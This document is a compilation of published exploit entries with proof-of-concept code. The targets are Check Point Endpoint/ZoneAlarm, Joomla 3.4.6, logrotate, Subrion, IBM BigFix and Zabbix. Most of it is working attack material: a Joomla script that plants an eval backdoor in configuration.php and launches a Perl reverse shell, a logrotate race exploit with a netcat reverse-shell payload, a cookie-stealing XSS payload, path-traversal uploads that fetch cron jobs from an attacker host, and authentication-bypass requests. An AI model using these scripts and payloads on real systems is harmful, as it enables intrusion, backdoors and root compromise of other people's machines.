# Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation
# Date: 2019-01-30
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: https://www.checkpoint.com/
# Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514
# Version: Check Point ZoneAlarm <= 15.4.062.17802
# CVE: CVE-2019-8452


Description:
============

It is possible to change permissions of arbitrary file so that user have full control over it after exploitation which results in Local Privilege Escalation.

It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log".
Over this log file all authenticated users have full control and it was found that Check Point service writes to it with SYSTEM privileges.
However this file could not be used for exploitaion as it is always used/taken by Check Point service so for example this is why users cannot delete it in normal conditions (unless service crashes and/or is restarted).
However it was noticed that when this log file reaches some limit (depending on software) then it is archived to the same location and name but with ZIP extension. The same permissions are set for this archive file so all authenticated users can access it.

Taking all of this into account we can create an attack scenario:
1. If tvDebug.zip file exists then delete it
2. Create hardlink (using CreateHardlink.exe) named tvDebug.zip which points to other file that we would like to have permissions to (this file must not be taken by other process when Check Point service tries to use it)
3. Fill tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using software as normal user.
4. Restart system as service needs to be restarted to make an archive.
5. Now your file has permissions changed and you have all access to it.
6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one.
7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges.


Proof of Concept:
=================

# PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm.

# file that we want to have permissions to
# LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation
$file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll"

# path to symboliclink testing tools CreateHardlink.exe
# CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools
$hardlink = "C:\Temp\CreateHardlink.exe"

Write-Host "[!] Detecting Check Point software."
if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) {
$logfile = "$env:windir\Internet Logs\tvDebug.zip"
Write-Host "[+] Check Point Endpoint Security found."
}
elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) {
$logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip"
Write-Host "[+] Check Point ZoneAlarm found."
}
else {
Write-Host "[-] Check Point software was not found."
}

Write-Host "[!] Trying to delete tvDebug.zip file."
if ([System.IO.File]::Exists($logfile)) {
    while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force 朴ath $logfile -ErrorAction SilentlyContinue }
    Write-Host "[+] Successfully deleted tvDebug.zip archive file."
}
else {
    Write-Host "[+] tvDebug.zip archive file was not found."
}

Write-Host "[!] Creating hardlink to a file that we would like to change permissions."
Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`""
while (!([System.IO.File]::Exists($logfile))) { Sleep 1 }
Write-Host "[+] Hardlink successfully created."
Write-Host "[!] 1. Fill log file up to the limit and restart computer."
Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL."
Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load."

# Exploit Title: Joomla 3.4.6 - 'configuration.php' Remote Code Execution
# Google Dork: N/A
# Date: 2019-10-02
# Exploit Author: Alessandro Groppo @Hacktive Security
# Vendor Homepage: https//www.joomla.it/
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
# Version: 3.0.0 --> 3.4.6
# Tested on: Linux
# CVE : N/A
#
# Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
# Github: https://github.com/kiks7/rusty_joomla_rce
#
# The exploitation is implanting a backdoor in /configuration.php file in the root directory 
# with an eval in order to be more suitable for all environments, but it is also more intrusive.
# If you don't like this way, you can replace the get_backdoor_pay() 
# with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /')

#!/usr/bin/env python3

import requests
from bs4 import BeautifulSoup
import sys
import string
import random
import argparse
from termcolor import colored

PROXS = {'http':'127.0.0.1:8080'}
PROXS = {}

def random_string(stringLength):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))


backdoor_param = random_string(50)

def print_info(str):
print(colored("[*] " + str,"cyan"))

def print_ok(str):
print(colored("[+] "+ str,"green"))

def print_error(str):
print(colored("[-] "+ str,"red"))

def print_warning(str):
print(colored("[!!] " + str,"yellow"))

def get_token(url, cook):
token = ''
resp = requests.get(url, cookies=cook, proxies = PROXS)
html = BeautifulSoup(resp.text,'html.parser')
# csrf token is the last input
for v in html.find_all('input'):
csrf = v
csrf = csrf.get('name')
return csrf


def get_error(url, cook):
resp = requests.get(url, cookies = cook, proxies = PROXS)
if 'Failed to decode session object' in resp.text:
#print(resp.text)
return False
#print(resp.text)
return True


def get_cook(url):
resp = requests.get(url, proxies=PROXS)
#print(resp.cookies)
return resp.cookies


def gen_pay(function, command):
# Generate the payload for call_user_func('FUNCTION','COMMAND')
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
#payload =  command + ' || $a=\'http://wtf\';'
payload =  'http://l4m3rz.l337/;' + command
# Following payload will append an eval() at the enabled of the configuration file
#payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final

def make_req(url , object_payload):
# just make a req with object
print_info('Getting Session Cookie ..')
cook = get_cook(url)
print_info('Getting CSRF Token ..')
csrf = get_token( url, cook)

user_payload = '\\0\\0\\0' * 9
padding = 'AAA' # It will land at this padding
working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects

inj_object = '";'
inj_object += object_payload
inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
password_payload = padding + inj_object
params = {
'username': user_payload,
'password': password_payload,
'option':'com_users',
'task':'user.login',
            csrf :'1'
            }

print_info('Sending request ..')
resp  = requests.post(url, proxies = PROXS, cookies = cook,data=params)
return resp.text

def get_backdoor_pay():
# This payload will backdoor the the configuration .PHP with an eval on POST request

function = 'assert'
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# payload =  command + ' || $a=\'http://wtf\';'
# Following payload will append an eval() at the enabled of the configuration file
payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final

def check(url):
check_string = random_string(20)
target_url = url + 'index.php/component/users'
html = make_req(url, gen_pay('print_r',check_string))
if check_string in html:
return True
else:
return False

def ping_backdoor(url,param_name):
res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
if 'PWNED' in res.text:
return True
return False

def execute_backdoor(url, payload_code):
# Execute PHP code from the backdoor
res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
print(res.text)

def exploit(url, lhost, lport):
# Exploit the target
# Default exploitation will append en eval function at the end of the configuration.pphp
# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
# e.g. get_payload('system','rm -rf /')

# First check that the backdoor has not been already implanted
target_url = url + 'index.php/component/users'

make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
print_info('Now it\'s time to reverse, trying with a system + perl')
execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')


if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target',required=True,help='Joomla Target')
parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
args = vars(parser.parse_args())

url = args['target']
if(check(url)):
print_ok('Vulnerable')
if args['exploit']:
exploit(url, args['lhost'], args['lport'])
else:
print_info('Use --exploit to exploit it')

else:
print_error('Seems NOT Vulnerable ;/')

# Exploit Title: logrotten 3.15.1 - Privilege Escalation
# Date: 2019-10-04
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://github.com/logrotate/logrotate
# Software Link: https://github.com/logrotate/logrotate/releases/tag/3.15.1
# Version: all versions through 3.15.1
# Tested on: Debian GNU/Linux 9.5 (stretch)

## Brief description
  - logrotate is prone to a race condition after renaming the logfile.
  - If logrotate is executed as root, with option that creates a
    file ( like create, copy, compress, etc.) and the user is in control
    of the logfile path, it is possible to abuse a race-condition to write
    files in ANY directories.
  - An attacker could elevate his privileges by writing reverse-shells into
    directories like "/etc/bash_completition.d/".

## Precondition for privilege escalation
  - Logrotate has to be executed as root
  - The logpath needs to be in control of the attacker
  - Any option that creates files is set in the logrotate configuration

## Tested version
  - Debian GNU/Linux 9.5 (stretch)
  - Amazon Linux 2 AMI (HVM)
  - Ubuntu 18.04.1
  - logrotate 3.8.6
  - logrotate 3.11.0
  - logrotate 3.15.0

## Compile
  - gcc -o logrotten logrotten.c

## Prepare payload
```
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &);
fi"> payloadfile
```

## Run exploit

If "create"-option is set in logrotate.cfg:
```
 ./logrotten -p ./payloadfile /tmp/log/pwnme.log
```

If "compress"-option is set in logrotate.cfg:
```
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
```

## Known Problems
  - It's hard to win the race inside a docker container or on a lvm2-volume

## Mitigation
  - make sure that logpath is owned by root
  - use option "su" in logrotate.cfg
  - use selinux or apparmor

## Author
  - Wolfgang Hotwagner

## References

  - https://github.com/whotwagner/logrotten
  -
https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
  -
https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
  - https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
  -
https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd


logrotten.c

/*
 * logrotate poc exploit
 *
 * [ Brief description ]
 *   - logrotate is prone to a race condition after renaming the logfile.
 *   - If logrotate is executed as root and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories.
 *   - An attacker could elevate his privileges by writing reverse-shells into 
 *     directories like "/etc/bash_completition.d/".
 *
 * [ Precondition for privilege escalation ]
 *   - Logrotate needs to be executed as root
 *   - The logpath needs to be in control of the attacker
 *   - Any option(create,compress,copy,etc..) that creates a new file is set in the logrotate configuration. 
 * 
 * [ Tested version ]
 *   - Debian GNU/Linux 9.5 (stretch)
 *   - Amazon Linux 2 AMI (HVM)
 *   - Ubuntu 18.04.1
 *   - logrotate 3.8.6
 *   - logrotate 3.11.0
 *   - logrotate 3.15.0
 *
 * [ Compile ]
 *   - gcc -o logrotten logrotten.c
 *
 * [ Prepare payload ]
 *   - echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi"> payloadfile
 *
 * [ Run exploit ]
 *   - nice -n -20 ./logrotten -p payloadfile /tmp/log/pwnme.log
 *   - if compress is used: nice -n -20 ./logrotten -c -s 3 -p payloadfile /tmp/log/pwnme.log.1
 *
 * [ Known Problems ]
 *   - It's hard to win the race inside a docker container or on a lvm2-volume
 *
 * [ Mitigation ]
 *   - make sure that logpath is owned by root
 *   - use su-option in logrotate.cfg
 *   - use selinux or apparmor
 *
 * [ Author ]
 *   - Wolfgang Hotwagner
 *
 * [ Contact ]
 *   - https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
 *   - https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
 *   - https://github.com/whotwagner/logrotten
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#include <sys/stat.h>
#include <getopt.h>


#define EVENT_SIZE  ( sizeof (struct inotify_event) )
#define EVENT_BUF_LEN     ( 1024 * ( EVENT_SIZE + 16 ) )

/* use TARGETDIR without "/" at the end */
#define TARGETDIR "/etc/bash_completion.d"

#define PROGNAME "logrotten"

void usage(const char* progname)
{
printf("usage: %s [OPTION...] <logfile>\n",progname);
printf("  %-3s %-22s %-30s\n","-h","--help","Print this help");
printf("  %-3s %-22s %-30s\n","-t","--targetdir <dir>","Abosulte path to the target directory");
printf("  %-3s %-22s %-30s\n","-p","--payloadfile <file>","File that contains the payload");
printf("  %-3s %-22s %-30s\n","-s","--sleep <sec>","Wait before writing the payload");
printf("  %-3s %-22s %-30s\n","-d","--debug","Print verbose debug messages");
printf("  %-3s %-22s %-30s\n","-c","--compress","Hijack compressed files instead of created logfiles");
printf("  %-3s %-22s %-30s\n","-o","--open","Use IN_OPEN instead of IN_MOVED_FROM");
}

int main(int argc, char* argv[] )
{
  int length, i = 0;
  int j = 0;
  int index = 0;
  int fd;
  int wd;
  char buffer[EVENT_BUF_LEN];
  uint32_t imask = IN_MOVED_FROM;
  char *payloadfile = NULL;
  char *logfile = NULL;
  char *targetdir = NULL;
  char *logpath;
  char *logpath2;
  char *targetpath;
  int debug = 0;
  int sleeptime = 1;
  char ch;
  const char *p;
  FILE *source, *target;    

  int c;

  while(1)
  {
int this_option_optind = optind ? optind : 1;
int option_index = 0;
static struct option long_options[] = {
{"payloadfile", required_argument, 0, 0},
{"targetdir", required_argument, 0, 0},
{"sleep", required_argument, 0, 0},
{"help", no_argument, 0, 0},
{"open", no_argument, 0, 0},
{"debug", no_argument, 0, 0},
{"compress", no_argument, 0, 0},
{0,0,0,0}
};

c = getopt_long(argc,argv,"hocdp:t:s:", long_options, &option_index);
if (c == -1)
break;

switch(c)
{
case 'p':
payloadfile = alloca((strlen(optarg)+1)*sizeof(char));
  memset(payloadfile,'\0',strlen(optarg)+1);
strncpy(payloadfile,optarg,strlen(optarg));
break;
case 't':
targetdir = alloca((strlen(optarg)+1)*sizeof(char));
  memset(targetdir,'\0',strlen(optarg)+1);
strncpy(targetdir,optarg,strlen(optarg));
break;
case 'h':
usage(PROGNAME);
exit(EXIT_FAILURE);
break;
case 'd':
debug = 1;
break;
case 'o':
imask = IN_OPEN;
break;
case 'c':
imask = IN_OPEN;
break;
case 's':
sleeptime = atoi(optarg);
break;
default:
usage(PROGNAME);
exit(EXIT_FAILURE);
break;
}
  }

  if(argc == (optind+1))
  {
  logfile = alloca((strlen(argv[optind])+1)*sizeof(char));
  memset(logfile,'\0',strlen(argv[optind])+1);
  strncpy(logfile,argv[optind],strlen(argv[optind]));
  }
  else
  {
  usage(PROGNAME);
  exit(EXIT_FAILURE);
  }

  for(j=strlen(logfile); (logfile[j] != '/') && (j != 0); j--);

  index = j+1;

  p = &logfile[index];

  logpath = alloca(strlen(logfile)*sizeof(char));
  logpath2 = alloca((strlen(logfile)+2)*sizeof(char));

  if(targetdir != NULL)
  {
  targetpath = alloca( ( (strlen(targetdir)) + (strlen(p)) +3) *sizeof(char));
  strcat(targetpath,targetdir);
  }
  else
  {
targetdir= TARGETDIR;
  targetpath = alloca( ( (strlen(TARGETDIR)) + (strlen(p)) +3) *sizeof(char));
        targetpath[0] = '\0';
  strcat(targetpath,TARGETDIR);
  }
  strcat(targetpath,"/");
  strcat(targetpath,p);

  for(j = 0; j < index; j++)
  logpath[j] = logfile[j];
  logpath[j-1] = '\0';

  strcpy(logpath2,logpath);
  logpath2[strlen(logpath)] = '2';
  logpath2[strlen(logpath)+1] = '\0';

  /*creating the INOTIFY instance*/
  fd = inotify_init();

  if( debug == 1)
  {
  printf("logfile: %s\n",logfile);
  printf("logpath: %s\n",logpath);
  printf("logpath2: %s\n",logpath2);
  printf("targetpath: %s\n",targetpath);
  printf("targetdir: %s\n",targetdir);
  printf("p: %s\n",p);
  }

  /*checking for error*/
  if ( fd < 0 ) {
    perror( "inotify_init" );
  }

  wd = inotify_add_watch( fd,logpath, imask );

  printf("Waiting for rotating %s...\n",logfile);

while(1)
{
  i=0;
  length = read( fd, buffer, EVENT_BUF_LEN ); 

  while (i < length) {     
      struct inotify_event *event = ( struct inotify_event * ) &buffer[ i ];     if ( event->len ) {
      if ( event->mask & imask ) { 
  if(strcmp(event->name,p) == 0)
  {
            rename(logpath,logpath2);
            symlink(targetdir,logpath);
    printf("Renamed %s with %s and created symlink to %s\n",logpath,logpath2,targetdir);
    if(payloadfile != NULL)
    {
 printf("Waiting %d seconds before writing payload...\n",sleeptime);
    sleep(sleeptime);
    source = fopen(payloadfile, "r");    
    if(source == NULL)
            exit(EXIT_FAILURE);

    target = fopen(targetpath, "w");    
    if(target == NULL)
    {
            fclose(source);
            exit(EXIT_FAILURE);
    }

    while ((ch = fgetc(source)) != EOF)
            fputc(ch, target);

    chmod(targetpath,S_IRUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH);
    fclose(source);
    fclose(target);
    }
       inotify_rm_watch( fd, wd );
       close( fd );
    printf("Done!\n");

    exit(EXIT_SUCCESS);
  }
      }
    }
    i += EVENT_SIZE + event->len;
  }
}
  /*removing from the watch list.*/
   inotify_rm_watch( fd, wd );

  /*closing the INOTIFY instance*/
   close( fd );

   exit(EXIT_SUCCESS);
}

# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Date: 2019-10-07
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description :  Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.

First login the panel with user credential, Go to member tag from left menu.

http://localhost/panel/members/

Username, Full Name, Email are editable with double click on it. Insert the
following payload

<img src=x onerror=alert(document.cookie)>

# Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
# Date: 2018-12-11
# Exploit Authors: Jakub Palaczynski
# Vendor Homepage: https://www.ibm.com/
# Version: IBM Bigfix Platform <= 9.5.9.62
# CVE: CVE-2019-4013


Description:
============

Any authenticated (even unprivileged) user can upload any file to any location on the server with root privileges. This results in code execution on underlying system with root privileges.

What caused this issue:
* path traversal - it is possible to escape from original directory and upload file to any other location
* server running with root privileges - user can upload file to ANY location on the system
* upload any type of file - application does not verify extension and MIME type of uploaded files
* authorization bypass (reported as separate issue) - any user can reveal privileged functionality and access it without proper rights set
* possibility to win the race - application uploads file to location specified in "urlFileName" parameter (path traversal), however it then moves it to another. An attacker needs to win race and execute script before it is moved.

Issue was found in "Apps > Software > Add Software" menu. Here user needs to choose upload via URL option as only this one is vulnerable.
URL needs to point to attacker's web server where he hosts for example script files.
When form is submitted we can see on proxy "urlFileName" parameter. This one is vulnerable to path traversal. This parameter specifies temporary file name that will be used on the system. Then application moves this file to another location that is not controlled by application user.

An attacker can for example upload script file on the web server and execute it by sending GET request. However as a PoC we will use cron. Here we upload 2 files - cron file and script file that will be executed by cron.
Uploading cron task and script file is the same as below but of course with different content downloaded from the web server. Those two HTTP requests should be sent in loop to finally win a race and execute our script.


Proof of Concept:
=================

cron.txt served on attacker's web server:
* * * * * root bash /tmp/icmp.sh

icmp.txt served on attacker's web server:
#!/bin/bash
ping -c 3 ATTACKER_IP


Uploading cron task:
POST /swd/api/packages/upload HTTP/1.1

Host: XXX

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

Content-Length: 846

Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809

X-XSRF-TOKEN: XXX

Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX

Connection: close



-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="fileURL"



http://ATTACKER_IP/cron.txt

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="username"





-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="password"





-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="urlFileName"



../../../../../../../../etc/cron.d/task

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="urlDownloadAtRuntime"



false

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="uploadId"



user_1543410578364620

-----------------------------7289782871626994727576601809--


Uploading script file:
POST /swd/api/packages/upload HTTP/1.1

Host: XXX

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

Content-Length: 846

Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809

X-XSRF-TOKEN: XXX

Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX

Connection: close



-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="fileURL"



http://ATTACKER_IP/icmp.txt

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="username"





-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="password"





-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="urlFileName"



../../../../../../../../tmp/icmp.sh

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="urlDownloadAtRuntime"



false

-----------------------------7289782871626994727576601809

Content-Disposition: form-data; name="uploadId"



user_1543410578364620

-----------------------------7289782871626994727576601809--


After a while our script should be executed with root privileges.

# Exploit Title: Zabbix 4.2 - Authentication Bypass
# Date: 2019-10-06
# Exploit Author: Milad Khoshdel
# Software Link: https://www.zabbix.com/download
# Version: Zabbix [2.x , 3.x , 4.x] Tested on latest version Zabbix 4.2 
# Tested on: Linux Apache/2 PHP/7.2
# Google Dork: inurl:zabbix/zabbix.php



=========
Vulnerable Page:
=========

/zabbix.php?action=dashboard.view&dashboardid=1


=========
POC:
=========

Attacker can bypass login page and access to dashboard page and create [Dashboard/Report/Screen/Map] without any Username/Password and anonymously.
All Created elements [Dashboard/Report/Screen/Map] is accessible by other users and admin.


REGUEST -->

GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1
Host: [HOST-IP]
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


RESPONSE -->

HTTP/1.1 200 OK
Date: Sun, 06 Oct 2019 11:40:18 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: zbx_sessionid=a8d192ec833bd4476e0f6a550e6e5bed; HttpOnly
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 19239
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>

[Dashboard Page Content Will Load Here]

</html>

#!/usr/bin/perl -w
#
#  Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#  #  [ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [ Initializing the browser
#  #  [ >>> Referer => 
#  #  [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
#  #  [ >>> Content-Type => application/x-www-form-urlencoded
#  #  [ <<< Cache-Control => no-store, no-cache, must-revalidate
#  #  [ <<< Connection => close
#  #  [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
#  #  [ <<< Pragma => no-cache
#  #  [ <<< Server => nginx
#  #  [ <<< Vary => Accept-Encoding
#  #  [ <<< Content-Type => text/html; charset=UTF-8
#  #  [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
#  #  [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
#  #  [ <<< Client-Peer => 
#  #  [ <<< Client-Response-Num => 1
#  #  [ <<< Client-SSL-Cert-Issuer => 
#  #  [ <<< Client-SSL-Cert-Subject => 
#  #  [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
#  #  [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
#  #  [ <<< Client-SSL-Warning => Peer certificate not verified
#  #  [ <<< Client-Transfer-Encoding => chunked
#  #  [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"
#  #  [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
#  #  [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
#  #  [ <<< Title => TARGET: Dashboard
#  #  [ <<< X-Content-Type-Options => nosniff
#  #  [ <<< X-Frame-Options => SAMEORIGIN
#  #  [ <<< X-Meta-Author => Zabbix SIA
#  #  [ <<< X-Meta-Charset => utf-8
#  #  [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
#  #  [ <<< X-Meta-Msapplication-Config => none
#  #  [ <<< X-Meta-Msapplication-TileColor => #d40000
#  #  [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
#  #  [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
#  #  [ <<< X-UA-Compatible => IE=Edge
#  #  [ <<< X-XSS-Protection => 1; mode=block
#  #  [
#  #  [ The target is vulnerable. Try to open these links:
#  #  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
#  #  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
#  #  [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
#  #  [ https://TARGET/zabbix/overview.php?ddreset=1
#  #  [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
#  #  [ https://TARGET/zabbix/latest.php?ddreset=1
#  #  [ https://TARGET/zabbix/charts.php?ddreset=1
#  #  [ https://TARGET/zabbix/screens.php?ddreset=1
#  #  [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
#  #  [ https://TARGET/zabbix/srv_status.php?ddreset=1
#  #  [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
#  #  [ https://TARGET/zabbix/hostinventories.php?ddreset=1
#  #  [ https://TARGET/zabbix/report2.php?ddreset=1
#  #  [ https://TARGET/zabbix/toptriggers.php?ddreset=1
#  #  [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
#  #  [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
